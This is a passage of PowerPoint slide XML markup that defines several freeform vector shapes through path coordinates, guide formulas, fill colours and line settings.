                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35881" name="Freeform 415"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3065" y="2202"/>
                <a:ext cx="38" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 38"/>
                  <a:gd name="T1" fmla="*/ 24 h 34"/>
                  <a:gd name="T2" fmla="*/ 34 w 38"/>
                  <a:gd name="T3" fmla="*/ 25 h 34"/>
                  <a:gd name="T4" fmla="*/ 30 w 38"/>
                  <a:gd name="T5" fmla="*/ 27 h 34"/>
                  <a:gd name="T6" fmla="*/ 26 w 38"/>
                  <a:gd name="T7" fmla="*/ 27 h 34"/>
                  <a:gd name="T8" fmla="*/ 23 w 38"/>
                  <a:gd name="T9" fmla="*/ 27 h 34"/>
                  <a:gd name="T10" fmla="*/ 21 w 38"/>
                  <a:gd name="T11" fmla="*/ 28 h 34"/>
                  <a:gd name="T12" fmla="*/ 18 w 38"/>
                  <a:gd name="T13" fmla="*/ 32 h 34"/>
                  <a:gd name="T14" fmla="*/ 14 w 38"/>
                  <a:gd name="T15" fmla="*/ 33 h 34"/>
                  <a:gd name="T16" fmla="*/ 8 w 38"/>
                  <a:gd name="T17" fmla="*/ 34 h 34"/>
                  <a:gd name="T18" fmla="*/ 2 w 38"/>
                  <a:gd name="T19" fmla="*/ 28 h 34"/>
                  <a:gd name="T20" fmla="*/ 0 w 38"/>
                  <a:gd name="T21" fmla="*/ 22 h 34"/>
                  <a:gd name="T22" fmla="*/ 0 w 38"/>
                  <a:gd name="T23" fmla="*/ 16 h 34"/>
                  <a:gd name="T24" fmla="*/ 1 w 38"/>
                  <a:gd name="T25" fmla="*/ 12 h 34"/>
                  <a:gd name="T26" fmla="*/ 0 w 38"/>
                  <a:gd name="T27" fmla="*/ 10 h 34"/>
                  <a:gd name="T28" fmla="*/ 1 w 38"/>
                  <a:gd name="T29" fmla="*/ 10 h 34"/>
                  <a:gd name="T30" fmla="*/ 3 w 38"/>
                  <a:gd name="T31" fmla="*/ 10 h 34"/>
                  <a:gd name="T32" fmla="*/ 3 w 38"/>
                  <a:gd name="T33" fmla="*/ 9 h 34"/>
                  <a:gd name="T34" fmla="*/ 4 w 38"/>
                  <a:gd name="T35" fmla="*/ 9 h 34"/>
                  <a:gd name="T36" fmla="*/ 3 w 38"/>
                  <a:gd name="T37" fmla="*/ 8 h 34"/>
                  <a:gd name="T38" fmla="*/ 4 w 38"/>
                  <a:gd name="T39" fmla="*/ 6 h 34"/>
                  <a:gd name="T40" fmla="*/ 4 w 38"/>
                  <a:gd name="T41" fmla="*/ 5 h 34"/>
                  <a:gd name="T42" fmla="*/ 6 w 38"/>
                  <a:gd name="T43" fmla="*/ 5 h 34"/>
                  <a:gd name="T44" fmla="*/ 8 w 38"/>
                  <a:gd name="T45" fmla="*/ 4 h 34"/>
                  <a:gd name="T46" fmla="*/ 9 w 38"/>
                  <a:gd name="T47" fmla="*/ 4 h 34"/>
                  <a:gd name="T48" fmla="*/ 9 w 38"/>
                  <a:gd name="T49" fmla="*/ 3 h 34"/>
                  <a:gd name="T50" fmla="*/ 10 w 38"/>
                  <a:gd name="T51" fmla="*/ 4 h 34"/>
                  <a:gd name="T52" fmla="*/ 11 w 38"/>
                  <a:gd name="T53" fmla="*/ 4 h 34"/>
                  <a:gd name="T54" fmla="*/ 12 w 38"/>
                  <a:gd name="T55" fmla="*/ 5 h 34"/>
                  <a:gd name="T56" fmla="*/ 13 w 38"/>
                  <a:gd name="T57" fmla="*/ 5 h 34"/>
                  <a:gd name="T58" fmla="*/ 13 w 38"/>
                  <a:gd name="T59" fmla="*/ 5 h 34"/>
                  <a:gd name="T60" fmla="*/ 12 w 38"/>
                  <a:gd name="T61" fmla="*/ 4 h 34"/>
                  <a:gd name="T62" fmla="*/ 13 w 38"/>
                  <a:gd name="T63" fmla="*/ 4 h 34"/>
                  <a:gd name="T64" fmla="*/ 14 w 38"/>
                  <a:gd name="T65" fmla="*/ 3 h 34"/>
                  <a:gd name="T66" fmla="*/ 15 w 38"/>
                  <a:gd name="T67" fmla="*/ 2 h 34"/>
                  <a:gd name="T68" fmla="*/ 16 w 38"/>
                  <a:gd name="T69" fmla="*/ 2 h 34"/>
                  <a:gd name="T70" fmla="*/ 17 w 38"/>
                  <a:gd name="T71" fmla="*/ 2 h 34"/>
                  <a:gd name="T72" fmla="*/ 18 w 38"/>
                  <a:gd name="T73" fmla="*/ 2 h 34"/>
                  <a:gd name="T74" fmla="*/ 19 w 38"/>
                  <a:gd name="T75" fmla="*/ 2 h 34"/>
                  <a:gd name="T76" fmla="*/ 20 w 38"/>
                  <a:gd name="T77" fmla="*/ 2 h 34"/>
                  <a:gd name="T78" fmla="*/ 21 w 38"/>
                  <a:gd name="T79" fmla="*/ 0 h 34"/>
                  <a:gd name="T80" fmla="*/ 21 w 38"/>
                  <a:gd name="T81" fmla="*/ 1 h 34"/>
                  <a:gd name="T82" fmla="*/ 22 w 38"/>
                  <a:gd name="T83" fmla="*/ 1 h 34"/>
                  <a:gd name="T84" fmla="*/ 23 w 38"/>
                  <a:gd name="T85" fmla="*/ 1 h 34"/>
                  <a:gd name="T86" fmla="*/ 23 w 38"/>
                  <a:gd name="T87" fmla="*/ 0 h 34"/>
                  <a:gd name="T88" fmla="*/ 24 w 38"/>
                  <a:gd name="T89" fmla="*/ 1 h 34"/>
                  <a:gd name="T90" fmla="*/ 25 w 38"/>
                  <a:gd name="T91" fmla="*/ 1 h 34"/>
                  <a:gd name="T92" fmla="*/ 25 w 38"/>
                  <a:gd name="T93" fmla="*/ 1 h 34"/>
                  <a:gd name="T94" fmla="*/ 26 w 38"/>
                  <a:gd name="T95" fmla="*/ 0 h 34"/>
                  <a:gd name="T96" fmla="*/ 28 w 38"/>
                  <a:gd name="T97" fmla="*/ 0 h 34"/>
                  <a:gd name="T98" fmla="*/ 28 w 38"/>
                  <a:gd name="T99" fmla="*/ 0 h 34"/>
                  <a:gd name="T100" fmla="*/ 28 w 38"/>
                  <a:gd name="T101" fmla="*/ 0 h 34"/>
                  <a:gd name="T102" fmla="*/ 28 w 38"/>
                  <a:gd name="T103" fmla="*/ 1 h 34"/>
                  <a:gd name="T104" fmla="*/ 29 w 38"/>
                  <a:gd name="T105" fmla="*/ 3 h 34"/>
                  <a:gd name="T106" fmla="*/ 34 w 38"/>
                  <a:gd name="T107" fmla="*/ 6 h 34"/>
                  <a:gd name="T108" fmla="*/ 37 w 38"/>
                  <a:gd name="T109" fmla="*/ 10 h 34"/>
                  <a:gd name="T110" fmla="*/ 38 w 38"/>
                  <a:gd name="T111" fmla="*/ 14 h 34"/>
                  <a:gd name="T112" fmla="*/ 38 w 38"/>
                  <a:gd name="T113" fmla="*/ 19 h 34"/>
                  <a:gd name="T114" fmla="*/ 38 w 38"/>
                  <a:gd name="T115" fmla="*/ 22 h 34"/>
                  <a:gd name="T116" fmla="*/ 38 w 38"/>
                  <a:gd name="T117" fmla="*/ 24 h 3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38"/>
                  <a:gd name="T178" fmla="*/ 0 h 34"/>
                  <a:gd name="T179" fmla="*/ 38 w 38"/>
                  <a:gd name="T180" fmla="*/ 34 h 3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38" h="34">
                    <a:moveTo>
                      <a:pt x="38" y="24"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="34" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="24"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35882" name="Freeform 416"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="2176"/>
                <a:ext cx="30" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 30"/>
                  <a:gd name="T1" fmla="*/ 36 h 37"/>
                  <a:gd name="T2" fmla="*/ 11 w 30"/>
                  <a:gd name="T3" fmla="*/ 33 h 37"/>
                  <a:gd name="T4" fmla="*/ 1 w 30"/>
                  <a:gd name="T5" fmla="*/ 26 h 37"/>
                  <a:gd name="T6" fmla="*/ 1 w 30"/>
                  <a:gd name="T7" fmla="*/ 25 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 30"/>
                  <a:gd name="T9" fmla="*/ 23 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 30"/>
                  <a:gd name="T11" fmla="*/ 21 h 37"/>
                  <a:gd name="T12" fmla="*/ 1 w 30"/>
                  <a:gd name="T13" fmla="*/ 20 h 37"/>
                  <a:gd name="T14" fmla="*/ 1 w 30"/>
                  <a:gd name="T15" fmla="*/ 18 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 30"/>
                  <a:gd name="T17" fmla="*/ 17 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 30"/>
                  <a:gd name="T19" fmla="*/ 15 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 30"/>
                  <a:gd name="T21" fmla="*/ 12 h 37"/>
                  <a:gd name="T22" fmla="*/ 2 w 30"/>
                  <a:gd name="T23" fmla="*/ 11 h 37"/>
                  <a:gd name="T24" fmla="*/ 3 w 30"/>
                  <a:gd name="T25" fmla="*/ 11 h 37"/>
                  <a:gd name="T26" fmla="*/ 3 w 30"/>
                  <a:gd name="T27" fmla="*/ 9 h 37"/>
                  <a:gd name="T28" fmla="*/ 4 w 30"/>
                  <a:gd name="T29" fmla="*/ 7 h 37"/>
                  <a:gd name="T30" fmla="*/ 5 w 30"/>
                  <a:gd name="T31" fmla="*/ 5 h 37"/>
                  <a:gd name="T32" fmla="*/ 7 w 30"/>
                  <a:gd name="T33" fmla="*/ 5 h 37"/>
                  <a:gd name="T34" fmla="*/ 8 w 30"/>
                  <a:gd name="T35" fmla="*/ 6 h 37"/>
                  <a:gd name="T36" fmla="*/ 9 w 30"/>
                  <a:gd name="T37" fmla="*/ 7 h 37"/>
                  <a:gd name="T38" fmla="*/ 9 w 30"/>
                  <a:gd name="T39" fmla="*/ 5 h 37"/>
                  <a:gd name="T40" fmla="*/ 8 w 30"/>
                  <a:gd name="T41" fmla="*/ 2 h 37"/>
                  <a:gd name="T42" fmla="*/ 8 w 30"/>
                  <a:gd name="T43" fmla="*/ 1 h 37"/>
                  <a:gd name="T44" fmla="*/ 10 w 30"/>
                  <a:gd name="T45" fmla="*/ 1 h 37"/>
                  <a:gd name="T46" fmla="*/ 12 w 30"/>
                  <a:gd name="T47" fmla="*/ 0 h 37"/>
                  <a:gd name="T48" fmla="*/ 12 w 30"/>
                  <a:gd name="T49" fmla="*/ 2 h 37"/>
                  <a:gd name="T50" fmla="*/ 15 w 30"/>
                  <a:gd name="T51" fmla="*/ 3 h 37"/>
                  <a:gd name="T52" fmla="*/ 17 w 30"/>
                  <a:gd name="T53" fmla="*/ 5 h 37"/>
                  <a:gd name="T54" fmla="*/ 19 w 30"/>
                  <a:gd name="T55" fmla="*/ 8 h 37"/>
                  <a:gd name="T56" fmla="*/ 20 w 30"/>
                  <a:gd name="T57" fmla="*/ 8 h 37"/>
                  <a:gd name="T58" fmla="*/ 22 w 30"/>
                  <a:gd name="T59" fmla="*/ 10 h 37"/>
                  <a:gd name="T60" fmla="*/ 23 w 30"/>
                  <a:gd name="T61" fmla="*/ 9 h 37"/>
                  <a:gd name="T62" fmla="*/ 24 w 30"/>
                  <a:gd name="T63" fmla="*/ 11 h 37"/>
                  <a:gd name="T64" fmla="*/ 25 w 30"/>
                  <a:gd name="T65" fmla="*/ 12 h 37"/>
                  <a:gd name="T66" fmla="*/ 27 w 30"/>
                  <a:gd name="T67" fmla="*/ 12 h 37"/>
                  <a:gd name="T68" fmla="*/ 28 w 30"/>
                  <a:gd name="T69" fmla="*/ 13 h 37"/>
                  <a:gd name="T70" fmla="*/ 30 w 30"/>
                  <a:gd name="T71" fmla="*/ 15 h 37"/>
                  <a:gd name="T72" fmla="*/ 29 w 30"/>
                  <a:gd name="T73" fmla="*/ 16 h 37"/>
                  <a:gd name="T74" fmla="*/ 28 w 30"/>
                  <a:gd name="T75" fmla="*/ 17 h 37"/>
                  <a:gd name="T76" fmla="*/ 27 w 30"/>
                  <a:gd name="T77" fmla="*/ 18 h 37"/>
                  <a:gd name="T78" fmla="*/ 25 w 30"/>
                  <a:gd name="T79" fmla="*/ 17 h 37"/>
                  <a:gd name="T80" fmla="*/ 24 w 30"/>
                  <a:gd name="T81" fmla="*/ 18 h 37"/>
                  <a:gd name="T82" fmla="*/ 25 w 30"/>
                  <a:gd name="T83" fmla="*/ 19 h 37"/>
                  <a:gd name="T84" fmla="*/ 26 w 30"/>
                  <a:gd name="T85" fmla="*/ 20 h 37"/>
                  <a:gd name="T86" fmla="*/ 22 w 30"/>
                  <a:gd name="T87" fmla="*/ 23 h 37"/>
                  <a:gd name="T88" fmla="*/ 15 w 30"/>
                  <a:gd name="T89" fmla="*/ 24 h 37"/>
                  <a:gd name="T90" fmla="*/ 14 w 30"/>
                  <a:gd name="T91" fmla="*/ 33 h 37"/>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30"/>
                  <a:gd name="T139" fmla="*/ 0 h 37"/>
                  <a:gd name="T140" fmla="*/ 30 w 30"/>
                  <a:gd name="T141" fmla="*/ 37 h 37"/>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30" h="37">
                    <a:moveTo>
                      <a:pt x="14" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="14" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="37"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35883" name="Freeform 417"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3032" y="2176"/>
                <a:ext cx="30" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 14 w 30"/>
                  <a:gd name="T1" fmla="*/ 36 h 37"/>
                  <a:gd name="T2" fmla="*/ 11 w 30"/>
                  <a:gd name="T3" fmla="*/ 33 h 37"/>
                  <a:gd name="T4" fmla="*/ 1 w 30"/>
                  <a:gd name="T5" fmla="*/ 26 h 37"/>
                  <a:gd name="T6" fmla="*/ 1 w 30"/>
                  <a:gd name="T7" fmla="*/ 25 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 30"/>
                  <a:gd name="T9" fmla="*/ 23 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 30"/>
                  <a:gd name="T11" fmla="*/ 21 h 37"/>
                  <a:gd name="T12" fmla="*/ 1 w 30"/>
                  <a:gd name="T13" fmla="*/ 20 h 37"/>
                  <a:gd name="T14" fmla="*/ 1 w 30"/>
                  <a:gd name="T15" fmla="*/ 18 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 30"/>
                  <a:gd name="T17" fmla="*/ 17 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 30"/>
                  <a:gd name="T19" fmla="*/ 15 h 37"/>
